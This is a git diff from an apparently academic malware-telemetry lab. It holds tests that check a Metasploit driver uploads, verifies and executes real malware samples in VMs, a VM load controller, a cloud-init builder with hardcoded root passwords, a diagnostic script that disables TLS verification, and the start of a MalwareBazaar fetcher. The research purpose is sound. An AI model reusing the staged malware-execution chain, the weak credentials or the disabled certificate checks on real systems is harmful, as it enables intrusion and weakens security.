payload = b"\xde\xad\xbe\xef" * 4096 # 16 KiB → multiple chunks
sha = hashlib.sha256(payload).hexdigest()
(tmp_path / sha).write_bytes(payload)
sample = Sample(
name="real-multi", family="X", category="rat",
profile="bursty-c2", sha256=sha,
)
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
# Patch the fake to return "sha-ok" so the verify step passes.
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
client._verify_response = "sha-ok\n"
real_read = client.session_shell_read
def shell_read_with_verify(sid):
# Return verify token after the finalize command — i.e. once
# the most recent shell_write contained "sha256sum".
last = client.shell_writes[-1][1] if client.shell_writes else ""
if "sha256sum" in last:
return "sha-ok\n"
return real_read(sid)
client.session_shell_read = shell_read_with_verify # type: ignore[assignment]
events: list[tuple[str, dict]] = []
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(
target_ip="10.200.0.10",
session_open_timeout_s=0.5,
sample_store_root=tmp_path,
),
emit_event=lambda ev, **kw: events.append((ev, kw)),
sample=sample,
)
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting")
driver.set_phase("infected_running")
# All chunks + finalize + exec went through shell_write.
writes = [w for (_, w) in client.shell_writes]
n_printf = sum(1 for w in writes if w.startswith("printf '%s'"))
n_finalize = sum(1 for w in writes if "sha256sum" in w)
n_exec = sum(1 for w in writes if "nohup" in w and ".cis490-real" in w)
assert n_printf >= 2, f"expected multiple chunks, saw {n_printf}"
assert n_finalize == 1
assert n_exec == 1
# Events tell the same story.
names = [e for (e, _) in events]
assert "real_binary_upload_begin" in names
assert "real_binary_verify" in names
assert any(e == "sample_executed" and kw.get("kind") == "real"
for (e, kw) in events)
def test_driver_falls_back_to_mimic_when_real_binary_missing(tmp_path: Path) -> None:
sample = Sample(
name="real-but-missing", family="X", category="rat",
profile="bursty-c2", sha256="c" * 64,
)
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(
target_ip="10.200.0.10",
session_open_timeout_s=0.5,
sample_store_root=tmp_path, # empty
),
emit_event=lambda *a, **kw: None,
sample=sample,
)
# Mimic workload selected because the binary isn't staged.
assert driver.workload is not None
assert driver.workload.profile == "bursty-c2"
assert "real:" not in driver.workload.profile
# ---------------------------------------------------------------------------
# Fetcher input validation
# ---------------------------------------------------------------------------
def test_fetch_sample_rejects_bad_sha(tmp_path: Path) -> None:
from tools.fetch_sample import fetch_sample
with pytest.raises(ValueError, match="64 hex chars"):
fetch_sample("not-a-hash", tmp_path, api_key="x")
def test_fetch_sample_returns_existing_when_hash_matches(tmp_path: Path) -> None:
from tools.fetch_sample import fetch_sample
payload = b"already staged bytes"
sha = hashlib.sha256(payload).hexdigest()
p = tmp_path / sha
p.write_bytes(payload)
# api_key is unused on the cached path; pass anything.
out = fetch_sample(sha, tmp_path, api_key="ignored")
assert out == p
# File untouched.
assert p.read_bytes() == payload

View file

@ -0,0 +1,213 @@
"""Tests for VMLoadController against a fake SerialClient.
The controller's only job is to translate phases into shell commands
on a serial console + emit audit events. The key invariants we
encode here come from the elliott-lab incident where every phase
median'd 20% CPU because the workload silently never fired:
- every set_phase emits some event (so absence in events.jsonl is
a hard signal)
- infected_running emits workload_started AFTER sending the load
command
- dormant emits workload_killed WITH a pre_kill_probe so trainers
can detect "the workload was never running"
- exceptions in the shell call surface as workload_failed; they
do NOT propagate (the runner's on_phase callback would swallow
them anyway, but we want the audit row regardless)
"""
from __future__ import annotations
import sys
from pathlib import Path
import pytest
# Mirror the same path hack run_real_vm_demo.py uses so the tools/
# module imports work.
ROOT = Path(__file__).resolve().parent.parent
sys.path.insert(0, str(ROOT))
sys.path.insert(0, str(ROOT / "tools"))
from samples.manifest import Sample
from vm_load_controller import VMLoadController # noqa: E402
class FakeSerial:
"""Records every shell command. Returns canned probe output."""
def __init__(self, probe_response: str = "yes=1\nsh=1\nloadavg=0.45") -> None:
self.calls: list[str] = []
self.probe_response = probe_response
self.fail_on: list[str] = []
def run(self, cmd: str, timeout_s: float = 10.0) -> str:
self.calls.append(cmd)
for substr in self.fail_on:
if substr in cmd:
raise RuntimeError(f"fake-serial: failing on {substr!r}")
if "pgrep -c yes" in cmd or "pgrep -c sh" in cmd or "loadavg" in cmd:
return self.probe_response
return ""
# ---------------------------------------------------------------------------
# Event emission — the audit trail
# ---------------------------------------------------------------------------
def test_setup_emits_workload_setup_event() -> None:
serial = FakeSerial()
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.setup()
names = [e for e, _ in events]
assert "workload_setup" in names
setup = next(kw for e, kw in events if e == "workload_setup")
assert setup["profile"] == "v1-yes" # no Sample → fallback path
assert setup["sample"] is None
def test_setup_records_profile_when_sample_present() -> None:
serial = FakeSerial()
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, sample=s, emit_event=lambda e, **kw: events.append((e, kw)))
c.setup()
setup = next(kw for e, kw in events if e == "workload_setup")
assert setup["profile"] == "cpu-saturate"
assert setup["sample"] == "x"
def test_infected_running_emits_workload_started_after_command() -> None:
serial = FakeSerial()
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("infected_running")
# The command was sent.
assert any("yes > /dev/null" in cmd for cmd in serial.calls), \
f"expected v1 yes-loop in serial calls; got {serial.calls}"
# And the audit event followed it.
started = [kw for e, kw in events if e == "workload_started"]
assert started, "workload_started event must fire"
assert started[0]["phase"] == "infected_running"
assert started[0]["profile"] == "v1-yes"
def test_dormant_probes_before_killing() -> None:
"""The pre_kill_probe is the load-bearing diagnostic: it tells the
trainer whether the workload was actually running before we
killed it. If pgrep returns 0 yes processes, the previous
infected_running was a no-op and the episode is filterable."""
serial = FakeSerial(probe_response="yes=2\nsh=1\nloadavg=1.32")
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("dormant")
killed = [kw for e, kw in events if e == "workload_killed" and kw["phase"] == "dormant"]
assert killed, "dormant must emit workload_killed"
probe = killed[0].get("pre_kill_probe")
assert probe is not None
assert probe["yes"] == "2"
assert probe["loadavg"] == "1.32"
def test_dormant_probe_records_zero_when_workload_never_ran() -> None:
"""The exact symptom from elliott-lab: dormant probe shows 0
yes processes trainer can flag this episode as workload-not-firing."""
serial = FakeSerial(probe_response="yes=0\nsh=1\nloadavg=0.18")
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("dormant")
killed = next(kw for e, kw in events if e == "workload_killed" and kw["phase"] == "dormant")
assert killed["pre_kill_probe"]["yes"] == "0"
def test_clean_phase_emits_workload_killed() -> None:
serial = FakeSerial()
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("clean")
assert any(
e == "workload_killed" and kw["phase"] == "clean" for e, kw in events
), "clean must emit workload_killed"
def test_armed_emits_workload_armed_with_handshake_command() -> None:
serial = FakeSerial()
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("armed")
assert any("armed-handshake" in cmd for cmd in serial.calls)
assert any(e == "workload_armed" for e, _ in events)
def test_infecting_emits_workload_infecting_with_dd() -> None:
serial = FakeSerial()
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("infecting")
assert any("dd if=/dev/urandom" in cmd for cmd in serial.calls)
assert any(e == "workload_infecting" for e, _ in events)
# ---------------------------------------------------------------------------
# Exception handling — failures must surface as events, not propagate
# ---------------------------------------------------------------------------
def test_command_failure_emits_workload_failed_and_does_not_raise() -> None:
"""If the serial.run() raises (timeout, EOF, login bad), the
runner would silently swallow the exception. We want a hard
audit row in events.jsonl regardless."""
serial = FakeSerial()
serial.fail_on = ["yes > /dev/null"]
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
# Must NOT raise.
c.set_phase("infected_running")
failed = [kw for e, kw in events if e == "workload_failed"]
assert failed, "expected workload_failed event"
assert failed[0]["phase"] == "infected_running"
assert "fake-serial" in failed[0]["error"]
# ---------------------------------------------------------------------------
# Profile dispatch — Sample-driven workload picks the right command
# ---------------------------------------------------------------------------
def test_sample_with_profile_uses_workloads_module_command() -> None:
"""When constructed with a Sample, infected_running runs the
profile's start_cmd (from exploits.workloads) — NOT the v1 yes-loop."""
s = Sample(name="x", family="X", category="cryptominer", profile="cpu-saturate")
serial = FakeSerial()
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, sample=s, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("infected_running")
# The sample's workload script + the post-kill yes sweep both ran.
# The new workload is profile-shaped, not the simple yes-loop.
profile_command_seen = any(".cis490-workload-cpu-saturate" in cmd for cmd in serial.calls)
assert profile_command_seen, f"expected workload script in serial calls; got {serial.calls}"
started = next(kw for e, kw in events if e == "workload_started")
assert started["profile"] == "cpu-saturate"
assert started["sample"] == "x"
# ---------------------------------------------------------------------------
# Default emit (no callback supplied) is a no-op
# ---------------------------------------------------------------------------
def test_no_emit_callback_is_safe() -> None:
"""Tests + code paths that don't pass an emitter shouldn't
crash. The default is a no-op lambda."""
serial = FakeSerial()
c = VMLoadController(serial)
# Should not raise.
c.setup()
c.set_phase("infected_running")
c.set_phase("dormant")
c.set_phase("clean")

View file

@ -28,7 +28,7 @@ from pathlib import Path
import pycdlib
DEFAULT_USER_DATA = """\
DEFAULT_USER_DATA_HEAD = """\
#cloud-config
hostname: cis490
manage_etc_hosts: true
@ -45,10 +45,70 @@ chpasswd:
list: |
root:cis490
cis490:cis490
runcmd:
- [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]
"""
# OpenRC service file shipped inside the guest. Alpine uses OpenRC;
# the runcmd at the bottom of user-data wires it up on first boot.
OPENRC_SERVICE = """\
#!/sbin/openrc-run
description="CIS490 in-guest telemetry agent"
command="/usr/local/bin/cis490-agent"
command_args="--port /dev/virtio-ports/cis490.guest.agent"
command_background=true
pidfile="/run/cis490-agent.pid"
output_log="/var/log/cis490-agent.log"
error_log="/var/log/cis490-agent.log"
depend() {
need localmount
}
"""
DEFAULT_META_DATA = """\
instance-id: cis490-vm-001
local-hostname: cis490
"""
def _indent(text: str, n: int) -> str:
pad = " " * n
return "\n".join(pad + line if line else line for line in text.splitlines())
def build_user_data(*, embed_agent: bool, agent_path: Path | None) -> bytes:
"""Build a cloud-init user-data document. When ``embed_agent`` is
True, also stuff the in-guest agent + an OpenRC service into
``write_files`` and arrange to start the service on first boot."""
head = DEFAULT_USER_DATA_HEAD
if not embed_agent:
return (head + 'runcmd:\n - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]\n').encode()
if agent_path is None:
agent_path = Path(__file__).resolve().parent.parent / "vm" / "guest-agent" / "cis490_agent.py"
if not agent_path.exists():
raise FileNotFoundError(f"agent script not found: {agent_path}")
agent_src = agent_path.read_text()
body = head + (
"write_files:\n"
" - path: /usr/local/bin/cis490-agent\n"
" permissions: '0755'\n"
" owner: root:root\n"
" content: |\n"
f"{_indent(agent_src, 6)}\n"
" - path: /etc/init.d/cis490-agent\n"
" permissions: '0755'\n"
" owner: root:root\n"
" content: |\n"
f"{_indent(OPENRC_SERVICE, 6)}\n"
"runcmd:\n"
' - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]\n'
' - [ sh, -c, "command -v rc-update >/dev/null && rc-update add cis490-agent default || true" ]\n'
' - [ sh, -c, "command -v rc-service >/dev/null && rc-service cis490-agent start || true" ]\n'
)
return body.encode()
DEFAULT_META_DATA = """\
instance-id: cis490-vm-001
local-hostname: cis490
@ -93,11 +153,26 @@ def main() -> int:
default=None,
help="path to a custom meta-data file",
)
parser.add_argument(
"--no-embed-agent",
action="store_true",
help="don't bake the in-guest agent into user-data",
)
parser.add_argument(
"--agent-path",
type=Path,
default=None,
help="path to the in-guest agent (default: vm/guest-agent/cis490_agent.py)",
)
args = parser.parse_args()
user_data = (
args.user_data.read_bytes() if args.user_data else DEFAULT_USER_DATA.encode()
)
if args.user_data:
user_data = args.user_data.read_bytes()
else:
user_data = build_user_data(
embed_agent=not args.no_embed_agent,
agent_path=args.agent_path,
)
meta_data = (
args.meta_data.read_bytes() if args.meta_data else DEFAULT_META_DATA.encode()
)

638
tools/cis490_doctor.py Normal file
View file

@ -0,0 +1,638 @@
"""``cis490-doctor`` — single-command diagnostic for a lab host or receiver.
Walks the full bring-up stack from the bottom up and prints a
green/yellow/red checklist with the exact command that fixes each
red row. Run this whenever:
- you just cloned the repo and aren't sure what's missing
- you ran install-lab-host.sh but `index.jsonl` on the Pi is empty
- somebody filed an issue saying "shipping isn't working"
Usage:
uv run python tools/cis490_doctor.py # human output
uv run python tools/cis490_doctor.py --json # machine-readable
uv run python tools/cis490_doctor.py --role lab-host # default
uv run python tools/cis490_doctor.py --role receiver
Exits non-zero if any RED check fails.
"""
from __future__ import annotations
import argparse
import dataclasses
import json
import os
import shutil
import socket
import ssl
import subprocess
import sys
import tomllib
from dataclasses import dataclass, field
from pathlib import Path
# ANSI color codes; auto-disable on non-tty.
def _supports_color() -> bool:
return sys.stdout.isatty() and os.environ.get("NO_COLOR") is None
_ANSI_GREEN = "\033[32m" if _supports_color() else ""
_ANSI_YELLOW = "\033[33m" if _supports_color() else ""
_ANSI_RED = "\033[31m" if _supports_color() else ""
_ANSI_BOLD = "\033[1m" if _supports_color() else ""
_ANSI_DIM = "\033[2m" if _supports_color() else ""
_ANSI_RESET = "\033[0m" if _supports_color() else ""
@dataclass
class Check:
name: str
status: str # "ok" | "warn" | "fail" | "skip"
detail: str = ""
fix: str = ""
def render(self) -> str:
glyph = {
"ok": f"{_ANSI_GREEN}[✓]{_ANSI_RESET}",
"warn": f"{_ANSI_YELLOW}[!]{_ANSI_RESET}",
"fail": f"{_ANSI_RED}[✗]{_ANSI_RESET}",
"skip": f"{_ANSI_DIM}[-]{_ANSI_RESET}",
}[self.status]
line = f"{glyph} {self.name}"
if self.detail:
line += f" {_ANSI_DIM}{self.detail}{_ANSI_RESET}"
if self.status == "fail" and self.fix:
line += f"\n {_ANSI_BOLD}fix:{_ANSI_RESET} {self.fix}"
return line
@dataclass
class Report:
role: str
checks: list[Check] = field(default_factory=list)
def add(self, c: Check) -> None:
self.checks.append(c)
# Mirror to stdout immediately so a hung check doesn't leave
# the operator without partial info.
if not _JSON_MODE:
print(c.render(), flush=True)
def to_dict(self) -> dict:
return {
"role": self.role,
"checks": [dataclasses.asdict(c) for c in self.checks],
"summary": self.summary(),
}
def summary(self) -> dict:
out = {"ok": 0, "warn": 0, "fail": 0, "skip": 0}
for c in self.checks:
out[c.status] = out.get(c.status, 0) + 1
return out
_JSON_MODE = False
# ---------------------------------------------------------------------------
# helpers
# ---------------------------------------------------------------------------
def _run(cmd: list[str], *, timeout: float = 5.0) -> tuple[int, str, str]:
try:
p = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
return p.returncode, p.stdout.strip(), p.stderr.strip()
except (FileNotFoundError, subprocess.TimeoutExpired) as e:
return -1, "", str(e)
def _path_exists(p: Path) -> bool:
try:
return p.exists()
except PermissionError:
return True # treat unreadable-but-present as present
def _size_str(p: Path) -> str:
try:
return f"{p.stat().st_size // (1024*1024)} MiB"
except (OSError, PermissionError):
return "(stat denied — re-run with sudo for size)"
# ---------------------------------------------------------------------------
# checks — repo
# ---------------------------------------------------------------------------
def check_repo(report: Report, repo_root: Path) -> None:
if not (repo_root / ".git").exists():
report.add(Check(
"repo: .git directory present",
"warn",
detail=f"running from {repo_root} which isn't a git checkout — fine for /opt/cis490 (cp -aT'd) but not the source clone",
))
return
rc, head, _ = _run(["git", "-C", str(repo_root), "rev-parse", "--short=8", "HEAD"])
rc2, branch, _ = _run(["git", "-C", str(repo_root), "rev-parse", "--abbrev-ref", "HEAD"])
rc3, dirty, _ = _run(["git", "-C", str(repo_root), "status", "--porcelain"])
rc4, log, _ = _run(["git", "-C", str(repo_root), "log", "-1", "--format=%s"])
detail = f"{branch}@{head}: {log[:60]}"
if branch != "main":
report.add(Check(
"repo: on main",
"warn",
detail=detail,
fix=f"cd {repo_root} && git fetch && git checkout main && git pull",
))
else:
report.add(Check("repo: on main", "ok", detail=detail))
if dirty:
report.add(Check(
"repo: tree clean",
"warn",
detail=f"{len(dirty.splitlines())} modified files",
))
else:
report.add(Check("repo: tree clean", "ok"))
rc5, behind, _ = _run(
["git", "-C", str(repo_root), "rev-list", "--count", "HEAD..@{u}"],
)
if rc5 == 0 and behind.isdigit() and int(behind) > 0:
report.add(Check(
"repo: up to date with origin",
"warn",
detail=f"{behind} commits behind",
fix=f"cd {repo_root} && git pull",
))
elif rc5 == 0:
report.add(Check("repo: up to date with origin", "ok"))
# ---------------------------------------------------------------------------
# checks — install
# ---------------------------------------------------------------------------
def check_install(report: Report, role: str) -> None:
install_root = Path("/opt/cis490")
if not _path_exists(install_root):
report.add(Check(
"install: /opt/cis490 exists",
"fail",
fix=f"sudo $(pwd)/scripts/install-{role}.sh",
))
return
report.add(Check("install: /opt/cis490 exists", "ok"))
venv_python = install_root / ".venv" / "bin" / "python"
if _path_exists(venv_python):
rc, ver, _ = _run([str(venv_python), "--version"])
report.add(Check("install: venv python", "ok",
detail=ver if rc == 0 else "(unreadable)"))
else:
report.add(Check(
"install: venv python",
"fail",
fix=f"sudo /opt/cis490/scripts/install-{role}.sh",
))
cfg_name = "lab-host.toml" if role == "lab-host" else "receiver.toml"
cfg = Path("/etc/cis490") / cfg_name
if _path_exists(cfg):
try:
with open(cfg, "rb") as f:
tomllib.load(f)
report.add(Check(f"config: {cfg}", "ok", detail="parses"))
except PermissionError:
# Mode 0640 root:cis490 is the install default. Doctor often
# runs as the unprivileged user — file is fine, we just
# can't read it from here.
report.add(Check(
f"config: {cfg}",
"warn",
detail="exists, can't read (mode 0640 root:cis490 — re-run with sudo for full audit)",
))
except tomllib.TOMLDecodeError as e:
report.add(Check(
f"config: {cfg}",
"fail",
detail=str(e),
fix=f"sudo $EDITOR {cfg}",
))
else:
report.add(Check(
f"config: {cfg}",
"fail",
fix=f"sudo cp /opt/cis490/etc/{cfg_name}.example {cfg}",
))
if role == "lab-host":
env = Path("/etc/cis490/lab-host.env")
if _path_exists(env):
report.add(Check("config: lab-host.env", "ok"))
else:
report.add(Check(
"config: lab-host.env",
"fail",
fix="sudo /opt/cis490/scripts/install-lab-host.sh "
"# regenerates the env file",
))
# ---------------------------------------------------------------------------
# checks — certs (lab-host)
# ---------------------------------------------------------------------------
def check_certs_lab_host(report: Report) -> None:
base = Path("/etc/cis490/certs")
expected = ["wg-ca.pem", "lab-host.pem", "lab-host.key"]
missing = [n for n in expected if not _path_exists(base / n)]
if missing:
report.add(Check(
f"mTLS: certs at {base}",
"fail",
detail=f"missing: {missing}",
fix="On the Pi: sudo /home/max/.env/wg-pki/scripts/"
"deploy-cis490-cert.sh <host_id> <this-machine-wg-ip>",
))
return
# Verify the chain.
rc, out, err = _run([
"openssl", "verify",
"-CAfile", str(base / "wg-ca.pem"),
str(base / "lab-host.pem"),
])
if rc == 0 and "OK" in out:
report.add(Check("mTLS: cert chain validates", "ok",
detail=out.splitlines()[0]))
else:
report.add(Check(
"mTLS: cert chain validates",
"fail",
detail=err or out,
fix="re-issue the leaf via wg-pki/scripts/deploy-cis490-cert.sh",
))
# ---------------------------------------------------------------------------
# checks — services
# ---------------------------------------------------------------------------
def check_services(report: Report, role: str) -> None:
services = (
["cis490-receiver"]
if role == "receiver"
else ["cis490-shipper", "cis490-orchestrator"]
)
for svc in services:
rc, state, _ = _run(["systemctl", "is-active", svc])
if state == "active":
report.add(Check(f"systemd: {svc} active", "ok"))
elif state == "inactive":
report.add(Check(
f"systemd: {svc} active",
"fail",
detail="inactive",
fix=f"sudo systemctl enable --now {svc}",
))
else:
report.add(Check(
f"systemd: {svc} active",
"fail",
detail=state or "unknown",
fix=f"sudo journalctl -u {svc} --no-pager -n 30",
))
# ---------------------------------------------------------------------------
# checks — network (lab-host)
# ---------------------------------------------------------------------------
def check_network_lab_host(report: Report, cfg_path: Path) -> None:
try:
with open(cfg_path, "rb") as f:
cfg = tomllib.load(f)
except (FileNotFoundError, PermissionError, tomllib.TOMLDecodeError) as e:
report.add(Check("net: lab-host.toml readable", "fail", detail=str(e)))
return
receiver_url = cfg.get("receiver", {}).get("url", "")
if not receiver_url.startswith("https://"):
report.add(Check(
"net: receiver.url present",
"fail",
detail=receiver_url,
fix=f"edit {cfg_path}: receiver.url = 'https://collector.wg'",
))
return
host = receiver_url.split("//", 1)[1].split("/", 1)[0].split(":")[0]
port = 443
if ":" in receiver_url.split("//", 1)[1].split("/", 1)[0]:
port = int(receiver_url.split("//", 1)[1].split("/", 1)[0].split(":")[1])
try:
ip = socket.gethostbyname(host)
report.add(Check(f"net: DNS resolve {host}", "ok",
detail=f"-> {ip}"))
except socket.gaierror as e:
report.add(Check(
f"net: DNS resolve {host}",
"fail",
detail=str(e),
fix=f"echo '10.100.0.1 {host}' | sudo tee -a /etc/hosts "
"# wg-enroll provisions this on real lab hosts",
))
return
try:
with socket.create_connection((host, port), timeout=5):
report.add(Check(f"net: TCP {host}:{port} reachable", "ok"))
except OSError as e:
report.add(Check(
f"net: TCP {host}:{port} reachable",
"fail",
detail=str(e),
fix="check iptmonads is allowing the WG-side 443 + Caddy is up",
))
return
# mTLS handshake — pull the receiver cert paths from cfg.
ca = cfg.get("receiver", {}).get("ca_bundle")
cert = cfg.get("receiver", {}).get("client_cert")
key = cfg.get("receiver", {}).get("client_key")
if not (ca and cert and key):
report.add(Check("net: mTLS handshake to collector.wg",
"skip", detail="cert paths not in config"))
return
try:
ctx = ssl.create_default_context(cafile="/home/max/wg-pki/certs/caddy-root.crt"
if Path("/home/max/wg-pki/certs/caddy-root.crt").exists()
else None)
ctx.load_cert_chain(certfile=cert, keyfile=key)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_connection((host, port), timeout=5) as sock:
with ctx.wrap_socket(sock, server_hostname=host) as ssock:
report.add(Check("net: mTLS handshake to collector.wg",
"ok",
detail=f"cipher={ssock.cipher()[0]}"))
except (ssl.SSLError, OSError, FileNotFoundError) as e:
report.add(Check(
"net: mTLS handshake to collector.wg",
"fail",
detail=str(e),
fix="sudo /home/max/wg-pki/scripts/deploy-cis490-cert.sh <host_id> <wg_ip> "
"(rerun cert deploy)",
))
# ---------------------------------------------------------------------------
# checks — VM prereqs (lab-host)
# ---------------------------------------------------------------------------
def check_vm_prereqs(report: Report) -> None:
if not _path_exists(Path("/dev/kvm")):
report.add(Check(
"vm: /dev/kvm",
"fail",
fix="ensure KVM kernel module is loaded; on x86 hosts: sudo modprobe kvm-intel || sudo modprobe kvm-amd",
))
else:
report.add(Check("vm: /dev/kvm", "ok"))
if shutil.which("qemu-system-x86_64") is None:
report.add(Check(
"vm: qemu-system-x86_64 on PATH",
"fail",
fix="install qemu-system-x86 via the host package manager",
))
else:
report.add(Check("vm: qemu-system-x86_64 on PATH", "ok"))
if shutil.which("zstd") is None:
report.add(Check(
"vm: zstd on PATH (shipper compression)",
"fail",
fix="install zstd via the host package manager",
))
else:
report.add(Check("vm: zstd on PATH", "ok"))
images = Path("/var/lib/cis490/vm/images")
alpine = images / "alpine-baseline.qcow2"
cidata = images / "cidata.iso"
if _path_exists(alpine):
report.add(Check(f"vm: {alpine}", "ok",
detail=_size_str(alpine)))
else:
report.add(Check(
f"vm: {alpine}",
"fail",
fix=f"sudo /opt/cis490/scripts/fetch-alpine-baseline.sh {alpine}",
))
if _path_exists(cidata):
report.add(Check(f"vm: {cidata}", "ok",
detail=_size_str(cidata)))
else:
report.add(Check(
f"vm: {cidata}",
"fail",
fix=f"sudo /opt/cis490/.venv/bin/python /opt/cis490/tools/build_cidata.py {cidata}",
))
# ---------------------------------------------------------------------------
# checks — Tier 3 (optional)
# ---------------------------------------------------------------------------
def check_tier3(report: Report) -> None:
if shutil.which("msfrpcd") is None:
report.add(Check(
"tier3: msfrpcd on PATH",
"warn",
detail="optional — only needed for real exploit episodes",
fix="sudo /opt/cis490/scripts/install-msfrpcd.sh",
))
else:
report.add(Check("tier3: msfrpcd on PATH", "ok"))
# Probe whether msfrpcd is actually listening (tier-3 fleet
# dispatch checks the same thing).
msfrpcd_listening = False
try:
with socket.create_connection(("127.0.0.1", 55553), timeout=0.5):
msfrpcd_listening = True
except OSError:
pass
if msfrpcd_listening:
report.add(Check("tier3: msfrpcd listening on 127.0.0.1:55553", "ok"))
else:
report.add(Check(
"tier3: msfrpcd listening on 127.0.0.1:55553",
"warn",
detail="optional — fleet falls back to Tier 2 when down",
fix="sudo systemctl enable --now cis490-msfrpcd",
))
# Module catalog parses + at least one same-socket entry.
modules_dir = Path("/opt/cis490/exploits/modules")
if modules_dir.exists():
try:
from exploits.modules import load_module_configs as _load
catalog = _load(modules_dir)
same_socket = [k for k, v in catalog.items() if not v.requires_bridge]
report.add(Check(
"tier3: module catalog parses",
"ok",
detail=f"{len(catalog)} modules, {len(same_socket)} same-socket "
f"({len(catalog) - len(same_socket)} need BRIDGE)",
))
except Exception as e:
report.add(Check(
"tier3: module catalog parses",
"fail",
detail=str(e),
fix="check exploits/modules/*.toml syntax",
))
images = Path("/var/lib/cis490/vm/images")
msf2 = images / "metasploitable2.qcow2"
if _path_exists(msf2):
report.add(Check(f"tier3: {msf2}", "ok",
detail=_size_str(msf2)))
else:
report.add(Check(
f"tier3: {msf2}",
"warn",
detail="optional — needed for Tier-3 episodes",
fix="IMAGE_URL=… IMAGE_SHA256=… sudo /opt/cis490/scripts/fetch-metasploitable2.sh",
))
def check_bridge(report: Report) -> None:
"""Bridge readiness — pcap (source 4) + reverse/bind callback
payloads both need this. Without it, Tier-3 episodes that pick
callback modules will fire but the session never lands."""
rc, out, _ = _run(["ip", "-br", "link", "show", "br-malware"])
if rc == 0 and "br-malware" in out:
if "UP" in out or "UNKNOWN" in out:
report.add(Check("bridge: br-malware up", "ok", detail=out.strip()[:80]))
else:
report.add(Check(
"bridge: br-malware up",
"warn",
detail=out.strip()[:80],
fix="sudo ip link set br-malware up",
))
else:
report.add(Check(
"bridge: br-malware exists",
"warn",
detail="optional — pcap capture + callback-payload Tier-3 "
"modules require it",
fix="sudo /opt/cis490/vm/setup_bridge.sh",
))
# ---------------------------------------------------------------------------
# checks — end to end (lab-host)
# ---------------------------------------------------------------------------
def check_end_to_end(report: Report) -> None:
cfg = "/etc/cis490/lab-host.toml"
if not _path_exists(Path(cfg)):
report.add(Check("e2e: cis490-shipper --ping", "skip",
detail="no lab-host.toml"))
return
rc, out, err = _run([
"/opt/cis490/.venv/bin/python", "-m", "shipper",
"--config", cfg, "--ping",
], timeout=15.0)
if rc == 0 and '"ok": true' in out:
report.add(Check("e2e: cis490-shipper --ping", "ok",
detail="200 OK"))
else:
report.add(Check(
"e2e: cis490-shipper --ping",
"fail",
detail=(out or err)[:200],
fix="paste this row's detail into a Forgejo issue or to the operator",
))
# ---------------------------------------------------------------------------
# main
# ---------------------------------------------------------------------------
def main(argv: list[str] | None = None) -> int:
global _JSON_MODE
p = argparse.ArgumentParser(prog="cis490-doctor")
p.add_argument("--role", choices=("lab-host", "receiver"), default="lab-host")
p.add_argument("--json", action="store_true",
help="machine-readable output (suppresses progressive printing)")
p.add_argument("--no-tier3", action="store_true",
help="skip the optional Tier-3 prerequisite checks")
args = p.parse_args(argv)
_JSON_MODE = args.json
repo_root = Path(__file__).resolve().parent.parent
if not _JSON_MODE:
print(f"{_ANSI_BOLD}cis490-doctor{_ANSI_RESET} role={args.role} repo={repo_root}\n")
report = Report(role=args.role)
check_repo(report, repo_root)
check_install(report, args.role)
if args.role == "lab-host":
check_certs_lab_host(report)
check_services(report, args.role)
if args.role == "lab-host":
check_network_lab_host(report, Path("/etc/cis490/lab-host.toml"))
check_vm_prereqs(report)
check_bridge(report)
if not args.no_tier3:
check_tier3(report)
check_end_to_end(report)
summary = report.summary()
if _JSON_MODE:
json.dump(report.to_dict(), sys.stdout, indent=2)
print()
else:
print()
print(f"{_ANSI_BOLD}summary:{_ANSI_RESET} "
f"{_ANSI_GREEN}{summary['ok']} ok{_ANSI_RESET}, "
f"{_ANSI_YELLOW}{summary['warn']} warn{_ANSI_RESET}, "
f"{_ANSI_RED}{summary['fail']} fail{_ANSI_RESET}, "
f"{_ANSI_DIM}{summary['skip']} skip{_ANSI_RESET}")
if summary["fail"]:
print(
f"\n{_ANSI_BOLD}{_ANSI_RED}NOT READY.{_ANSI_RESET} "
"Run the `fix:` commands above in order, then re-run "
"`cis490-doctor`. When all rows are green/yellow, "
"episodes will start shipping to the Pi."
)
else:
print(
f"\n{_ANSI_BOLD}{_ANSI_GREEN}READY.{_ANSI_RESET} "
"Episodes should be flowing. Watch:\n"
" sudo journalctl -u cis490-shipper -f\n"
" ssh <pi> 'sudo tail -f /var/lib/cis490/index.jsonl'"
)
return 1 if summary["fail"] else 0
if __name__ == "__main__":
sys.exit(main())

142
tools/fetch_sample.py Normal file
View file

@ -0,0 +1,142 @@
"""Fetch a malware sample by sha256 from MalwareBazaar.
Lands the binary at ``samples/store/<sha256>`` (gitignored), verifies
the hash on the way in, and prints the resulting path on stdout.
Usage:
